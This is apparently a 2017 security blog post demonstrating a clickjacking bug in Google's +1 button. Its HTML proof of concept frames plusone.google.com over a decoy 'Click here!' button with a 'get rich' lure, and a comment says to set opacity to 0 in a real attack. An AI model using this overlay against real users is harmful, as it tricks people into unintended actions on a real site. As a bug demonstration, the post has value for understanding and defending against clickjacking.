Sunday, 16 July 2017

Google G+1 ClickJacking BUG





The previous basic introduction tutorial - https://www.youtube.com/watch?v=cbgNHnMsaPg&t=192s



The snippet -

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:0px;
  opacity: 1; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="https://plusone.google.com/_/+1/fastbutton?bsv&size=medium&hl=en-US&url=https://engineering.linkedin.com/security/our-private-bug-bounty-program-reducing-vulnerabilities-leveraging-expert-crowds"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div> 

............................................................


Other Posts -






Cross Site Scripting (XSS) - 6 (Reflected XSS at its best)

Create Unlimited Instagram Accounts (unvalidated verification)


3 comments: